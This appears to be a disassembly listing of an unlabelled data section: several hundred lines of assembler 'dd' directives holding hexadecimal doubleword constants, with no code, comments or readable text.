dd 33E09833h, 3C5316D2h, 85D7A802h, 3F9F5BDBh, 0A52AED59h
dd 559DF8E1h, 0C54D2761h, 69CE931Ah, 805830A7h, 0A1E0DD02h
dd 19874DCBh, 0A50FF97Ah, 1A94DFFh, 0D75A2A08h, 76D98D25h
dd 0F56E3485h, 0C8B017h, 1A010B96h, 6B33FE2Ch, 2D27248h
dd 9659FAF5h, 72FF6D87h, 649668F6h, 40DD8E02h, 9889B794h
dd 0CED92DCFh, 0A456288Eh, 0D881C61Ch, 0BBF8857Ah, 0D84EB0C3h
dd 0C88DE856h, 93DF1449h, 503C858h, 1A8468F1h, 0B089230Bh
dd 4E3CCF7h, 9270C880h, 0D61A070Bh, 23FD78F8h, 8594D4F0h
dd 80C9764Ch, 334F7C93h, 5D41BDF3h, 191098FCh, 28C30830h
dd 0B0CD78F8h, 713C2CBDh, 0C18B18CEh, 0C0CAD078h, 7EDD6C88h
dd 2B057BEh, 0D3930862h, 1232A80Eh, 0A96038BDh, 0F8079F64h
dd 47881A37h, 4151B7B1h, 0FFD8470Fh, 60958DDAh, 3C6BC8CCh
dd 0CB710848h, 3BDF127Ch, 480D82DAh, 90AB5884h, 6A7BCA98h
dd 27B5060h, 0E06FA8CEh, 0AF234B6Dh, 0D0DF5E3Fh, 0CF16A718h
dd 0B0834E13h, 64D45DF4h, 814C313h, 1307A8C5h, 60E0A532h
dd 0D3E388BCh, 0BF025FCBh, 723AF35Ah, 0AD2DF8C8h, 90B382EBh
dd 0FF2220D2h, 0F5FCC7BFh, 0E0F59674h, 79749791h, 0DA29888Ah
dd 0BBD00707h, 0B0A3AEE3h, 3E8455D4h, 6879486Bh, 0F1847B9h
dd 5E9FAD95h, 1046989Ch, 0CFBC288Eh, 0B09F5153h, 0DFF31C3Eh
dd 42FED3BBh, 85E9D88Ch, 0FD5C4CE0h, 0E0ECE001h, 0AEECF0FCh
dd 72A7795h, 0D85A3B87h, 0A07D6846h, 0C0659E9h, 0B3595839h
dd 57423559h, 313538E0h, 80F2C938h, 0D5EE598Bh, 0B06F461Ah
dd 0DFC9EC31h, 80657EB1h, 40B9592h, 70DF6D00h, 0BDA5A86Eh
dd 4B58F55Dh, 3FEB885Ah, 2BF96D35h, 0F20D6836h, 10EFF859h
dd 44BA4828h, 7560DE7Ch, 60053382h, 5544B881h, 40E113E4h
dd 0B075780Ch, 3AA72BCBh, 9032B05Ch, 4224C872h, 0B9E99281h
dd 8946583Bh, 40CC5829h, 0C8E58D2Ah, 0A546BA90h, 0A02D5746h
dd 45683A83h, 8019480Ah, 1D06E550h, 60E5331Bh, 0EF2705A7h
dd 3C52088Ah, 0BF3F702Ch, 20AD51F2h, 98F7D9E4h, 5489C850h
dd 70F63CA8h, 9AF0572Eh, 0DBD308A2h, 0E4C505F6h, 30AFF97Ch
dd 481D02B6h, 108BD850h, 80AB1A94h, 86F24767h, 53D538A0h
dd 0D4D415C5h, 11B1087Bh, 0E11D12B9h, 20E5E93Ch, 0C2BB58C4h
dd 3E2B5DCDh, 0F54138B0h, 0B01EDCF8h, 51B77028h, 3F7688EAh
dd 32AFDCECh, 350268C6h, 107BE716h, 0F419CDFBh, 0A0535B06h
dd 60DFFCF5h, 8674C9BEh, 7E2B9DA5h, 35A678D8h, 76BD9DF6h
dd 0AEFDCD5Bh, 57C4C802h, 1AE06AC4h, 77A8F0AAh, 50931958h
dd 0AAC1BB61h, 9B9CA128h, 0F08D38F6h, 421B8844h, 0BEF3DD7Dh
dd 34A6B8E0h, 60952A56h, 0D827EC33h, 7F639DC5h, 4F8C78B8h
dd 3072FA83h, 94790584h, 0A1748F2h, 0FBD13915h, 0F0102C43h
dd 0DD6AFB3Ch, 0D0F1883Fh, 669EFB18h, 6039BA79h, 113450FBh
dd 4964862h, 0F007B9C0h, 154F16BEh, 0EE63DEBCh, 41D5071Ah
dd 30BF7889h, 0D158C8C8h, 0C0A5D922h, 754E869Bh, 0B6B8B302h
dd 0CBAAA9E8h, 503949D2h, 3F92DEDBh, 2010F26Dh, 61A63166h
dd 10D45DDBh, 5F44842h, 0F0F7A62Bh, 6C3D2874h, 80C3988Ch
dd 4AA4F7A9h, 8D9F6857h, 200DE8DAh, 90C4DD4Bh, 0B100C8B2h
dd 0F1573820h, 0A997F8B0h, 0F5B617AAh, 43A1886Ah, 0CA3F01Eh
dd 39F9674Bh, 2CEBD8B4h, 2CAA3D02h, 75C882ACh, 60352872h
dd 0F08395C1h, 612C28FAh, 0C50B1D2Fh, 0D144C9h, 0EEDA2451h
dd 74A1E86Dh, 0F1464D74h, 0DAD5AB10h, 386637F3h, 0C07ECF8Ch
dd 2055C9B7h, 575D6801h, 85348A76h, 802976A8h, 0A0F77843h
dd 69FD788Eh, 9483984Ch, 2C9F7FD5h, 0B03B1947h, 1FD77D69h
dd 50BE5814h, 0C99AFE06h, 4F53BD69h, 88D4A85Eh, 0D0F31ABCh
dd 9037D97Bh, 0FD16D67h, 35B06816h, 10BBC3EBh, 0D4D07BB2h
dd 0A1D5E801h, 3260D7EFh, 57638812h, 0D52E2C9Eh, 0B02F462Eh
dd 0AD2D2B8Eh, 900B4D93h, 6A4A3153h, 8FF652C1h, 0E416571Dh
dd 90560D63h, 1B72D27Eh, 3B1C28F3h, 2D2138E5h, 961BE1h
dd 8C43C3C2h, 7B67B831h, 60D42014h, 0FBBB9B0Ch, 8B3A68B1h
dd 0C47EDE1Bh, 0D56FAF53h, 5778762Fh, 0CCE29B3Dh, 2003B3F7h
dd 0B105C25Ah, 0AF4C722Eh, 0D01F6E7Fh, 6A027358h, 23FD78F8h
dd 0DF40D4F0h, 47DEA121h, 1847D217h, 63FAA17Eh, 966CCB2Fh
dd 12D05F0Eh, 0D9B2248Dh, 53029A55h, 0CCAF3ECBh, 6427A145h
dd 2CC44FEFh, 9257DDADh, 6E77639h, 0A972FAAFh, 75339657h
dd 0CFB118DEh, 1039BD66h, 0E7CB29D6h, 9F6FCC95h, 62955C2Dh
dd 0A35398CCh, 30080A44h, 0D9A717DAh, 5224C67Bh, 0FCDA3FE7h
dd 2E50B093h, 3E975410h, 0C04EEB87h, 31197A53h, 0B38EE7CFh
dd 751CAD12h, 0EAD448D4h, 306591BBh, 0F2F03E44h, 0A50DCDA4h
dd 607528D6h, 3D62C5ACh, 404116B7h, 0A5C8FD4Eh, 0DF2DE8E6h
dd 80A526F1h, 1FE109D2h, 6E1D0434h, 0DED31D25h, 0FC0A180Ch
dd 0EAB4A6B6h, 0CF11799Eh, 2DBE1D7Bh, 34E269h, 820FC342h
dd 55811DE7h, 58E5AD93h, 554C989Ch, 4021302Ch, 4AD9F192h
dd 0DBF3A65Ah, 5F9959F5h, 21019859h, 0F3A8C7DBh, 0E4CD8CF2h
dd 58DB5C89h, 93A1886Ah, 7421BB9Eh, 5F7D240Ah, 0D55221h
dd 0F4994322h, 0F2AD2B9Dh, 52A0D7ADh, 2FA38852h, 0D7F99B0Ah
dd 588087B6h, 20EDE8BDh, 0CF181E77h, 44E79BDDh, 8F37744Ch
dd 0F09B22FBh, 0AE6FF0DCh, 0C26977B5h, 0CF10074Eh, 0B04FB6ABh
dd 9D02EB94h, 907BA087h, 0A1F6E970h, 3144788Fh, 5616671Dh
dd 0A8F11884h, 0B05F7823h, 7288BBC3h, 0D4156A37h, 0FFA9843Eh
dd 6029B275h, 0E08F404Eh, 238418BCh, 0AE08FA5Ah, 308E9EECh
dd 92A89756h, 99ABC84Ah, 90277267h, 7DB6B750h, 70EC5533h
dd 90E6112Ch, 11D118A5h, 8EB5EDF7h, 483EE866h, 901B58E0h
dd 19037DDFh, 0FDAE38D0h, 0F05A8E93h, 0A511F09Ch, 72777F5h
dd 20B195FDh, 234D68E6h, 95B7F1h, 157448C2h, 0F077A61Dh
dd 61BF7CCEh, 0B8119866h, 0C0B10878h, 8F35ED17h, 0E008E846h
dd 1DD92D9Eh, 1077A8BFh, 76BD6AA0h, 0FE281D83h, 6E7186Ch
dd 9270D8BAh, 0FA16DA7h, 5FA568D6h, 54FEA1h, 0C75C8EA2h
dd 0F047A851h, 60B52496h, 9F70CFECh, 72A24319h, 0FCB33CE6h
dd 0AAF81736h, 3DB489Ah, 49CF7Ah, 9102B580h, 0B925B8F6h
dd 6E65A5D1h, 0FDE988DAh, 0D89007CDh, 0A0DD68AAh, 59059143h
dd 0AEED0DCCh, 0F06BF4B4h, 5E1FBDA1h, 108698DCh, 42448C35h
dd 0D84C78A8h, 204DE813h, 89A4ED09h, 8D70C8E2h, 60A82ADDh
dd 150340CEh, 0EDF0E7C3h, 0C0F1B7BCh, 20CBF718h, 21BD6884h
dd 102A4818h, 81F11C62h, 0F07B8D1h, 704BDEABh, 402719ACh
dd 1051081Bh, 0B0D5AC03h, 36B817A4h, 159B485Bh, 0D7C9112h
dd 7064B028h, 4A7057AEh, 0BB530822h, 0AF7C0B68h, 302FE8E6h
dd 25104113h, 101BC6A7h, 82ECB712h, 75E7A88Fh, 0E9D127DEh
dd 5BC3988Dh, 40BA04BAh, 35104897h, 201DF6B9h, 0D13CDD82h
dd 6AE8C8A2h, 1A565220h, 0EE50578Ch, 0D33308C3h, 44AE7792h
dd 300FF9B8h, 0CBE8E5D5h, 7AEBC8AAh, 7F0A1A32h, 0E0F94605h
dd 6FF5ADFEh, 0D0A2D8E9h, 0CCAC85DAh, 17F6856h, 0DAD100BEh
dd 433A7DBh, 5EC9C892h
dd 44BEDE2Bh, 755AFC4Ah, 5003265Eh, 0DE1B35C7h, 315EF8A8h
dd 5FA775CEh, 975E556Bh, 0EA39581Ch, 0F0B3D070h, 334728DEh
dd 0EF890DB3h, 47C08AAh, 25D26C0Ch, 20DDAA7Eh, 9A8D5754h
dd 148D8CF9h, 721FD821h, 0AA97A904h, 53B90ABEh, 0C845CC21h
dd 0F1C01918h, 0AB6C60E6h, 0EFBBFC30h, 3D9418D0h, 0F0978718h
dd 60F53456h, 0E64DBD2Ch, 60FF28E2h, 95055826h, 1883CD53h
dd 0B0637D9Ch, 4A83BB77h, 50B9718Fh, 759AFF2Eh, 50C326A6h
dd 0C0ED4C8Bh, 30C5F878h, 5F4E3FB6h, 0B4D2C1h, 1074C3C2h
dd 9A67A825h, 0BCECB9Eh, 381295C5h, 40B1087Fh, 0BA7B5DCEh
dd 0B572BF56h, 90EB66FEh, 50650CB1h, 77BF334Bh, 6D45A80Eh
dd 40ADB8C1h, 3F72DFEAh, 20B0F2CDh, 0DE3DEDC6h, 58DE5560h
dd 3D9589Dh, 0E05228B5h, 0ED38287Eh, 0D033D9ABh, 40FBC671h
dd 4FAC2E99h, 3052EEA3h, 9023DBA4h, 8BD8E76Ch, 3802B57Eh
dd 5025B8D1h, 253DEA51h, 0EAE9E8DAh, 519007C2h, 0A93E7FD4h
dd 0FB4AAF99h, 0AB76C368h, 0B89A353Eh, 93953861h, 3BF41F68h
dd 0D58E5B83h, 0B0CF4652h, 353A5596h, 0E4BA5894h, 7519A0D8h
dd 0E5683860h, 0E0159664h, 1134A5BCh, 0B4E188BAh, 5FCA3F09h
dd 0A0BD7898h, 0D62BD8F4h, 90D80FE7h, 0F8EEB8D0h, 0A78AD7C0h
dd 0C0F61829h, 4051081Ah, 0B47D2508h, 6F27E5F6h, 0FFF43644h
dd 6666E8BCh, 161E5460h, 0AFC589CBh, 3D3A6C3Ch, 0AFB5A8EFh
dd 5C4A9BD8h, 0C1EF0A03h, 1D2ABDA0h, 0A0596848h, 0D0A89890h
dd 0D385D6Dh, 0B7E3EAE9h, 25557A9Bh, 0BA925906h, 45618D84h
dd 0F5172C2Ah, 7985BBC1h, 365000h, 81E5D1FEh, 35137C92h
dd 0A3C4F812h, 446199ACh, 0D40E486Ah, 798FB6D5h, 0A0632F4Ch
dd 0A7CDB5BDh, 8565C9Fh, 0F0C4F605h, 607D64BBh, 9006192Ch
dd 8986D7h, 0F83C314Ah, 66E9E4E6h, 16174A6Fh, 8EC0C11Ch
dd 19336BB8h, 0A9E0FF6Ah, 3AE2C2CCh, 0D2380071h, 62AAF8F1h
dd 0EF406867h, 96879405h, 0E7041ACh, 0F0BCEB28h, 259C67F9h
dd 0C4165809h, 0BE81B6h, 0F5563170h, 74E0E853h, 1C374BC7h
dd 0C1E0DC2Fh, 1C51B914h, 0D0C79C03h, 79FD7F83h, 8FD62C2Fh
dd 15A0A2C0h, 0B06EA532h, 921E1517h, 1F60F974h, 52587894h
dd 40D1089Ah, 0B03F7808h, 20ADE876h, 901B58E4h, 89C852h
dd 70F738C0h, 0E065A82Eh, 50D3189Ch, 0C041880Ah, 30AFF878h
dd 0A01D68E6h, 108BD854h, 80F948C2h, 0F067B830h, 60D5289Eh
dd 0D043980Ch, 40B1087Ah, 0B01F78E8h, 208DE856h, 90FB58C4h
dd 69C832h, 70D738A0h, 0E045A80Eh, 0E8169B1Ch, 0C02198A8h
dd 72335DDBh, 0AFFD68D6h, 9D7F9B83h, 37D650F1h, 2044BE5Bh
dd 44916CF5h, 0A22FDAC7h, 48D33343h, 0F2746CBBh, 2C2FC322h
dd 0D263CD2Dh, 85C0C802h, 70A77A3Ch, 22A6AD05h, 314AFA74h
dd 48018C08h, 204BA7BDh, 0A0B980A6h, 3023D814h, 0DB94882h
dd 0E0043475h, 78AC715Eh, 108094B8h, 0BF86EA3Eh, 0A09DEC2Dh
dd 0F9BA2B16h, 0B4E4D587h, 10CAC8E2h, 0FF6B489Fh, 0E4ED2BCEh
dd 0CDFAEEDEh, 0C0F1AB26h, 444FC29Bh, 0A38F4383h, 5EA6C886h
dd 0DEC2109Eh, 84078253h, 8B47D73Ah, 0C09167AFh, 0BFAE5FF2h
dd 9B715377h, 306F547Bh, 0DB980064h, 85860BE6h, 70677AD8h
dd 0A2712D69h, 5053180Ch, 0FC29888Ah, 0BB2FF8F8h, 0B0DFFCE3h
dd 0E6A230D4h, 9891B7BDh, 73E7B8B0h, 7017BCA3h, 0D8B6988Ch
dd 64399573h, 2C747878h, 62996529h, 1FB85854h, 10AB5037h
dd 0E4C2B120h, 8C5B8CCh, 503318FFh, 4B624159h, 300F784Bh
dd 4D953A46h, 1314274Ah, 901BF4B7h, 7311BB90h, 6F352484h
dd 0D0A29FE8h, 506B8BDAh, 4DFB7748h, 0ABEDE8B6h, 780B5466h
dd 0FF36365Ah, 328BBD03h, 26A6A87Eh, 0D01B928Ch, 0D9F588B3h
dd 44C10138h, 51B62825h, 91CA901Fh, 5FE697E3h, 0B45E39AFh
dd 15156492h, 18A8C1A0h, 4F0BF139h, 0B05FCFA7h, 584C8E96h
dd 9F096BFAh, 0A963F7h, 4A946EE0h, 6B80DD4Eh, 521808F6h
dd 316282A1h, 0CEBD10C9h, 153E97F9h, 10BB9AC8h, 0F8D9CD4Fh
dd 7403B7ABh, 9FF528BEh, 0C0212499h, 1539589Ah, 0B3C087F6h
dd 30EF54F3h, 2C9ED7E4h, 389D810h, 0F3A41CC4h, 3B56AAEEh
dd 0B3DBAE93h, 0E0880818h, 148B392Bh, 840141E2h, 4BAFD47Dh
dd 110A382h, 4BB0B7CBh, 0E1EB5C43h, 0BE0630F7h, 0C1877CA1h
dd 11242113h, 0A1A39CA9h, 25D98E3Fh, 814FBC9Eh, 283EAB5Bh
dd 615BDCFDh, 85A6587h, 4137FC19h, 15B0BEA3h, 21F31C27h
dd 3554E8CFh, 7FDF3C43h, 0E0052085h, 115C737Eh, 8EDC6713h
dd 0A985CAD9h, 4F008627h, 2407EAF5h, 6592B0FCh, 95C137EDh
dd 70A71EB9h, 0F8141088h, 0B453FA5Eh, 0A6E38AC9h, 68699293h
dd 5F28464Eh, 18895BEBh, 85D39905h, 50650A8h, 9A15D7A1h
dd 6008EBCFh, 79F40A6Ah, 1ADF688Eh, 4827CFFDh, 6A3BF2DCh
dd 0B031BDF1h, 8596D071h, 0E1BD5731h, 0D473183Ch, 11ECFC78h
dd 0DB8506F8h, 18B88370h, 902BD8F4h, 4326AAC9h, 0C9972D5Dh
dd 0B75E282Eh, 2720425Bh, 50688C9Fh, 0B0BF7888h, 0E0B8E7FEh
dd 6690B8A5h, 10304A57h, 76023940h, 0C56CA5C8h, 0D5A50BF7h
dd 0C0D1B108h, 56298DFAh, 4BB8596Bh, 1106BED0h, 68D22E67h
dd 0F18470Ch, 0E9616B95h, 0C0813419h, 0B7F2A3FAh, 0A0A6FCEDh
dd 200DE8D6h, 50EE574Ch, 0E84374B6h, 8FA8C7BCh, 0A2753D07h
dd 0D5C518ECh, 0C0B1B1E8h, 3F0B8DD9h, 8B7F8377h, 0E7287374h
dd 9060CCA7h, 0F0C7B890h, 0EA125CF6h, 0C09AE6E9h, 4BF1C9DAh
dd 0F5F4752Eh, 0D85D43D0h, 0EEDED28Eh, 0C1C9D8ABh, 173223E0h
dd 4BA3210Ah, 0FB75D8EFh, 0A4399AA1h, 9BEFFD37h, 9923EDACh
dd 48CFD884h, 2B21A8C3h, 64227EB3h, 691538F9h, 2C33BDA7h
dd 0F8972851h, 1B3978C3h, 24A7F17Dh, 6432B05Ch, 424378Dh
dd 78F7F932h, 200CAD28h, 5318B3DAh, 0AACB189Ah, 0C027A08Dh
dd 20C297F5h, 8C4CF1h, 7A994EE2h, 74A8CB58h, 9E365C6Ch
dd 2EA0ECE6h, 0BE167C50h, 4EE60CC2h, 0DEA19CBCh, 6E142C2Eh
dd 0B086BC98h, 0C03CD339h, 3BD502A9h, 0A563DC77h, 38F148E1h
dd 0C76C4493h, 0B024EC63h, 10ABD854h, 0F57FF8C2h, 7D63BC32h
dd 0C55FD6D1h, 0D053A170h, 0BC31A31Ch, 180DEDh, 0DFC26856h
dd 0F213F284h, 0F79637CDh, 60EEBC25h, 0E005A80Eh, 360B7E7Ch
dd 7423FDDBh, 80249E71h, 0DE7862DEh, 0D06BC80Dh, 68734B42h
dd 0FB8472Dh, 0E542A0CEh, 0D033A168h, 4091885Ah, 364F7ABDh
dd 19114DBCh, 3BBD58B4h, 754C3492h, 0F0B78887h, 4A6557A1h
dd 0C02E959Fh, 280198F3h, 0CF900735h, 9959ED51h, 104BD804h
dd 83CD5882h, 78DD840h, 70ACACDBh, 0D00398CCh, 0F8767C32h
dd 0B033F3FDh, 0A5BAA7BDh, 90AB6100h, 129C8F1h, 7067BC6Fh
dd 8B5A8CEh, 0EDFAB396h, 0C0F1CA36h, 0CFB134F0h, 0A55D879h
dd 0B096515Fh, 68995820h, 0FF8466Dh, 59F1ADC9h, 0D0E098BCh
dd 5A25081Ah, 893BFD7Fh, 202DE8E6h, 9AEF5964h, 0FFF7E63Ah
dd 8EECD0BFh, 9555751h, 0D5D8B3B6h, 0C0D1CA16h, 0F8043773h
dd 0E239D5EFh, 5882D8C4h, 0E41EF0BEh, 0C34C8E4Fh, 97FE4EDEh
dd 0C0FA1C09h, 40310BFAh, 468C0C68h, 30346A53h, 9A0FD844h
dd 0FF14625Ah, 8E0CD0DFh, 877D5771h, 0FB159198h, 6BC74859h
dd 98B7D2Fh, 0A07E6856h, 4A9FD8B4h, 0B9DBCDD4h, 8547B880h
dd 9DB4C0F4h, 0E24B6793h, 0A8EEF724h, 4F80854Ah, 3405C806h
dd 73A4A7DFh, 0FF71AEABh
dd 0E19C5E15h, 643023C5h, 0A71308E5h, 0C3437F98h, 45EFF8B8h
dd 5C818032h, 0F7B276Bh, 7FC3A6EAh, 0F1FDE8Fh, 0F1BE4ECBh
dd 5B4C13E7h, 50B3AC3Fh, 39975328h, 0A53A14DEh, 902B6180h
dd 0A9C871h, 0F5E00094h, 0E09591CAh, 56F318BCh, 4596A45Eh
dd 30DFC11Ch, 0A13D6806h, 0D243D201h, 68E6B71Fh, 0F78451Bh
dd 5971AD49h, 0D063983Ch, 4AA50C9Ah, 4FC2D4E0h, 0DDCC0089h
dd 15ECA71Bh, 99F1D6h, 70F738C4h, 768DBF5Ah, 0E82CE761h
dd 8BF4823h, 0F0A740D3h, 18B66C92h, 77602021h, 7D86A069h
dd 759047CFh, 60C5111Ah, 0D0439804h, 0FD317A0Fh, 0B00F416Ah
dd 0C8E49C56h, 6F04A5A1h, 2971E18Ah, 0E723269h, 2045B837h
dd 0F5B91B98h, 0C031B194h, 0CDC410F3h, 114D9739h, 92EE529Eh
dd 2AD9589Bh, 0FBA84F8h, 0E5032781h, 0D033A192h, 44510CD7h
dd 0B81FB988h, 8B0B6586h, 0C7715914h, 0FFB4E8FAh, 548B117Fh
dd 1BC71088h, 0D416EF05h, 0D00198F3h, 446FF838h, 0A94D8A1h
dd 0EA3E6072h, 2BDFA980h, 0FDB4418h, 0CA7D98A1h, 59A858FFh
dd 50338087h, 345A8FA8h, 4DF82Fh, 0E5BB5884h, 0DEC19FE5h
dd 2A68C79Ch, 0B8B56745h, 0D579D217h, 0C0F1B1D6h, 9AB3B291h
dd 5F41A06Eh, 9193BE0Bh, 41CBFA2h, 0B007A8E9h, 1475283Eh
dd 0F82718AFh, 792DAD10h, 1BD97898h, 62A1557Fh, 67305874h
dd 10304C57h, 70773840h, 50ECDDEEh, 2CD61A4Ch, 6AC198B3h
dd 9AB7D0Fh, 0A01D6876h, 1B7ED8D4h, 573F0F2h, 0F0F781CDh
dd 668C3B4h, 27DBA934h, 50088C7Fh, 0B09E7868h, 900F9CD6h
dd 0EDDE526Dh, 0C0E9D88Bh, 0D55D3BC4h, 0E0D591F3h, 0E855B39Ah
dd 455678EBh, 301FC15Ch, 0A07D6A46h, 0D85FDAC1h, 0B924ED28h
dd 5BA1B880h, 229D9577h, 401B987Ch, 0EB1108F3h, 89FBFDBFh
dd 20E5E8A6h, 0E12F5824h, 0FF35E87Ah, 0F4B2CFFFh, 0E0A5B857h
dd 251318D8h, 0CA393841h, 20D6863Dh, 0EDB6C226h, 294F5D63h
dd 88394812h, 0E1D2B870h, 809690B8h, 0E9FD3D46h, 0EB9708AAh
dd 5BF5B81Bh, 9758E83h, 0EE9E521Ch, 0C0A9D84Bh, 0D51D3B04h
dd 0E0959130h, 0D504B3DAh, 0C071B1AEh, 30CFE898h, 60BCD060h
dd 0D42BDB00h, 0FEBC42EAh, 9687A869h, 0E5432715h, 0D073A1AEh
dd 0BB7EE031h, 35C887F7h, 20BDD1F2h, 0D01B58E4h, 5039C626h
dd 498BBDC2h, 8CFA83Eh, 0AF2CE309h, 49BFC787h, 20ED68F5h
dd 24989FE6h, 108BC86Dh, 0F47948C2h, 5A8F083Ch, 0D468A135h
dd 3B43884Eh, 0BB50E07Fh, 0DAF78717h, 0D77217ADh, 80C2DC41h
dd 169C832h, 0C0DC4DA0h, 9CC0A24Eh, 0FAB30845h, 78478701h
dd 958538DBh, 0A0ED51BAh, 11DB7352h, 45CBF08h, 0F047A829h
dd 15B52A7Eh, 54A66FC3h, 40911863h, 0C5FF7CC8h, 2AAD582Ch
dd 80E22621h, 83EC4212h, 0B1B728B9h, 5843B80Eh, 0E038993Ah
dd 700963CAh, 4EEAF278h, 0ADD789Fh, 29CF5DE3h, 80B94892h
dd 0E052B8F8h, 88169038h, 0E97E3DC6h, 0EB17082Ah, 0B8347918h
dd 0A547A0A6h, 90AB61F9h, 0FAF62058h, 0F560C79Fh, 0E015914Ah
dd 5063183Ch, 0E594FD1Bh, 0C8CC407Eh, 99C0CD8Ch, 0BB4DD8E4h
dd 0A9338851h, 0E045286Dh, 0E4F0DF3Eh, 0D0E38895h, 3551281Ah
dd 5BC8C997h, 29958EEDh, 0ED3E527Ch, 0C009D8EBh, 0D57D3BA4h
dd 0E0F591D3h, 0ED7AB37Ah, 0C0D1CA1Ah, 95A53972h, 0A08D2AF6h
dd 48BB73B2h, 0B905CD40h, 184DB8A0h, 9FAAD267h, 0E9471D7Bh
dd 403208EAh, 9CEB7968h, 19896D21h, 907B5854h, 209CCCB2h
dd 49D3BDD7h, 0E0C5A89Eh, 5A461BFCh, 3F585682h, 0CA441027h
dd 0A09597B9h, 0F814274Eh, 7FA6B263h, 0C9433D67h, 603528EEh
dd 0D8D7906Ch, 0A8BBC16Ah, 4F808265h, 19696D41h, 905B5834h
dd 2ABDD892h, 0F51D3FB0h, 0E0B59112h, 5D09F81Dh, 0C0A580C3h
dd 9935DBAh, 449D6836h, 140F5897h, 79C6A0A9h, 9117478Fh
dd 99E2C074h, 68E567B3h, 0E5FBE845h, 0B04F4154h, 0C62543F0h
dd 67C4A7FDh, 10904CF7h, 701718E0h, 6BC1DC4Eh, 0D87E937Bh
dd 0EB619868h, 0CC8E7159h, 253730B6h, 10BBE108h, 79A6A048h
dd 757047AFh, 60E5113Ah, 0D023982Ch, 0F8B704EEh, 3535BB58h
dd 20BDD10Ah, 287D520Fh, 0A58328ADh, 70E701BCh, 768D0348h
dd 0A72CE765h, 0D0780C8Fh, 30AFFB78h, 2B421CE7h, 0B00E539Bh
dd 0ABF95880h, 0C2F31F8h, 0E522E1ADh, 0D053A188h, 4031087Ah
dd 3592769Dh, 209DD12Ah, 10BB504Eh, 0F81ACBCBh, 341A3C2Dh
dd 2145B82Ah, 0DB03109Ch, 0A6276B41h, 564FC9E0h, 2F450E6Dh
dd 10D3B0B4h, 61DB48A2h, 5B1F1376h, 66C0E1FBh, 1012208Ah
dd 8321A33Ch, 49D49062h, 0A59A17C9h, 90CB6120h, 8049C812h
dd 0BF3C22F4h, 0A2912D65h, 98B8184Ch, 28FDC043h, 0CF900147h
dd 4877AB16h, 0EFB42111h, 0B929CD0Fh, 75D0B8E0h, 608511DAh
dd 0F00398CCh, 6B260E4Fh, 0A9342050h, 0B65BB9Dh, 1B6B737Ch
dd 106B607Fh, 0F8023960h, 0E105B88Ch, 74379305h, 0A85C01AEh
dd 0BB4FE808h, 0B0FFE43Bh, 98AEF3F4h, 77995820h, 0E03E3C55h
dd 6075683Eh, 27E1ECACh, 4493A3C2h, 33E82E88h, 306F2C4Bh
dd 14945864h, 9C90Bh, 707735A8h, 0B2A0E3AEh, 631F5D52h
dd 8C85A6B8h, 0A5D0F8B4h, 0A08D5614h, 52D35D5Dh, 0B2A4852h
dd 28E484E8h, 0EB7D5BE1h, 0C92BACCFh, 0CBCEF70Fh, 0A0DDC0FDh
dd 620EB3D6h, 4CFED148h, 3E9D8F0h, 0F5DE3062h, 0E0D5EA6Eh
dd 0AF1B6B77h, 0C0A108D9h, 0C4FD10D8h, 1DF697B9h, 10FB9A0Ch
dd 74BFA074h, 654C476Fh, 60256A46h, 0D3ABD2E7h, 8E3A0490h
dd 0BF7A91CBh, 20EC883Eh, 0CADF5724h, 3C9C893h, 607584B5h
dd 9810AB6Eh, 0FC13089Eh, 458E6076h, 30EFF81Ah, 8B592EABh
dd 89A011h, 0D03F4B02h, 0F531B98h, 0D8A8AB21h, 0D083880Eh
dd 7CA03CFh, 0ABDC7724h, 0CBCDE897h, 28AE6108h, 0FA9D830h
dd 70163565h, 9800AB4Eh, 36F308FEh, 0E59EB0ABh, 30337D97h
dd 0E0B66806h, 24E8F376h, 747FA0B2h, 4DBE47AFh, 60E56A06h
dd 0D0871D23h, 0C5D2089Ah, 0B02F3AB4h, 62D56D75h, 909058F4h
dd 0F858F79h, 70F7F542h, 0E822932Eh, 50179B93h, 0C2880Ah
dd 24E8FB7Ah, 0E265EDE5h, 40D9D844h, 0C221FD3Dh, 6598B820h
dd 60C516ACh, 0DF831D56h, 40B1BFFFh, 0B08391E8h, 0DFB1E856h
dd 906FDDCBh, 3EE9C832h, 0FB5237B5h, 6B45A80Eh, 1398193Ah
dd 35C9D8DEh, 97007ABh, 0B0BFD07Bh, 131CAD34h, 909BF427h
dd 88C2BB10h, 0E9B5383Ch, 0C0617C69h, 7B91835Ah, 0A0BDA44Dh
dd 1B659A36h, 8099B821h, 3D20BA12h, 0B73880h, 0FFCD9F9Ch
dd 0DD93185Ch, 18A7484h, 726CFA13h, 445853B6h, 654BC856h
dd 907DCB8Eh, 0B4A8890Fh, 8BF4347Ah, 558C5BD7h, 40614AA2h
dd 0C86AF3C8h, 0C84DF854h, 6F44AC17h, 296193h, 7EE2B860h
dd 9209EFE5h, 58342335h, 3FDD0AA5h, 3F0607E7h, 5F43DA03h
dd 3417530Bh, 0A91DEFE3h, 0FF8B8D0h, 229EC7C1h, 0B0C7D22Dh
dd 0EB1081Ah, 0BC34B8BBh, 0E4A86FD2h, 199B4826h, 104B0857h
dd 0F8CEB540h, 0E3E5A887h, 40116099h, 6564EE8Ah, 33E9D3B6h
dd 0E2B67C24h, 0EB4D1ED8h, 0D3F88FAAh, 0F5E7B8B0h, 0E955281Eh
dd 8E9C64CAh, 0D5CE5F39h, 0B08F4616h, 2F120017h, 907A42C1h
dd 6ABD98B2h, 8FA85208h, 0F0FB761Bh, 0FF39DFCh, 0C1A40065h
dd 0BCE7F8D8h, 488297A2h, 10EBD8A5h, 0C62D2D71h, 0A3A2D4F9h
dd 12404B9Bh, 91DAEC05h, 0CA4F7DAh, 4F7F680Ah, 30D3DA23h
dd 0C4DED124h, 0E8C9D8D0h
dd 70373819h, 81F1CD3Dh, 275C7DB7h, 0B3F3ED24h, 609F91D0h
dd 0C92B0154h, 75ACBDF8h, 0DDD11F02h, 18584798h, 601528CDh
dd 0B5D1FD1Fh, 329E7CC9h, 0D92D284Dh, 45A181E0h, 0C73B3D63h
dd 0FF41F79Ah, 7005D01Fh, 85D6A84Eh, 3B9079FEh, 0B231F85Fh
dd 5CA68EF1h, 0A0580F63h, 0F8893023h, 98F1B71Dh, 0A387B850h
dd 19D6BDBh, 9E06FF42h, 26B87CF5h, 0D94D2871h, 45C18100h
dd 0C71B3D83h, 0FF6E37BAh, 0FDA3683Fh, 0F05838ABh, 0B7729Ch
dd 3F168960h, 209112EDh, 8421E1E6h, 2EAD4DABh, 40D348D2h
dd 0B12F05BDh, 3085288Eh, 40F6675Ch, 28B11847h, 0B01B78E9h
